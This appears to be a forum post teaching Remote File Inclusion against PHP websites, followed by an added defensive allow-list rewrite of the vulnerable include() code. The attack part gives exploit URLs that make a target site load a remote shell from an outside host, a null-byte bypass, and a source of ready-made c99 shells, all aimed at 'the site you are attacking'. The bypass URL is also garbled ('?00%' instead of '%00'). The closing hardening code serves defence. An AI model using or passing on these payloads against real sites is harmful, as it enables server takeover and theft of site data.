Remote file inclusion
[1] RFI?
[2] Vulnerable script
[3] Exploiting vulnerability
[4] Null byte bypass
Remote file inclusion
RFI (Remote File Inclusion) is a type of web hacking. It occurs when a PHP script uses the include() function to include a file whose name is taken from a GET parameter.
1) RFI example
- Code:
-
http://www.site.com/index.php?page=home
2) Vulnerable script
- Code:
-
<?php
$page = $_GET['page'];
include($page);
?>
3) Exploiting vulnerability
We have a site, guys:
- Code:
-
http://www.target-site.com/index.php?page=home
Now instead of home we are going to use our shell.
So we get:
- Code:
-
http://www.target-site.com/index.php?page=www.shell-link.com/shell.txt?
If the site is vulnerable, it should show the shell with a list of files from the site you are attacking.
4) Null byte bypass
Some scripts have a weak protection that includes the file and appends an .html extension, or some other extension:
- Code:
-
<?php
$page = $_GET['page'];
include($page.".html");
?>
In that case we are going to use the null byte bypass (%00).
Everything after %00 is ignored.
So the link should look like this:
- Code:
-
http://www.target-site.com/index.php?page=www.shell-link.com/shell.txt?00%
thanks!!
Once you have seen that the site is vulnerable to RFI, umm,
you can look for a site that has shells,
like c99 and i-47...
I will PM you the site if you are active...
Here is the shell site:
http://www.sh3ll.org/
so you can use:
- Code:
-
http://www.sh3ll.org/c99.text?
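
The include() pattern from sections 2 and 4 with an allow-list in front of it, as an added example that is not part of the original post. The page names, the pages/ directory and the sample inputs are assumptions made for illustration; the request value is used only as a lookup key, so a URL, a null byte or a traversal string never reaches include().

```php
<?php
// Added example, not the original post's code. Page names and the
// pages/ directory are hypothetical.

// Allow-list: the request value is only a lookup key and is never
// concatenated into a path or URL.
const ALLOWED_PAGES = [
    'home'    => 'home.html',
    'contact' => 'contact.html',
];

// Returns the absolute path of the page to include, or null if rejected.
function resolve_page($requested, string $baseDir): ?string
{
    // Rejects arrays (?page[]=x), URLs, NUL bytes, traversal: none is a key.
    if (!is_string($requested) || !array_key_exists($requested, ALLOWED_PAGES)) {
        return null;
    }
    $base = realpath($baseDir);
    $path = realpath($baseDir . '/' . ALLOWED_PAGES[$requested]);
    // Defence in depth: the file must exist and resolve inside $baseDir.
    if ($base === false || $path === false
        || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

if (PHP_SAPI === 'cli') {
    // Offline demo with constructed inputs, including the values from the URLs above.
    $dir = sys_get_temp_dir() . '/rfi_demo_' . getmypid();
    mkdir($dir);
    file_put_contents($dir . '/home.html', '<h1>home</h1>');
    $inputs = ['home', 'www.shell-link.com/shell.txt?', "home\0", '../../etc/passwd', ['x']];
    foreach ($inputs as $in) {
        $out = resolve_page($in, $dir);
        printf("%-36s %s\n", json_encode($in), $out === null ? 'rejected' : 'include ' . $out);
    }
    unlink($dir . '/home.html');
    rmdir($dir);
} else {
    // Web request: unknown names get a 404 instead of reaching include().
    $file = resolve_page($_GET['page'] ?? 'home', __DIR__ . '/pages');
    if ($file === null) {
        http_response_code(404);
        exit('Not found');
    }
    include $file;
}
```

Independently of the code, keep allow_url_include set to Off in php.ini (its default), which makes include() refuse http:// URLs; PHP 5.3.4 and later also reject paths that contain a null byte.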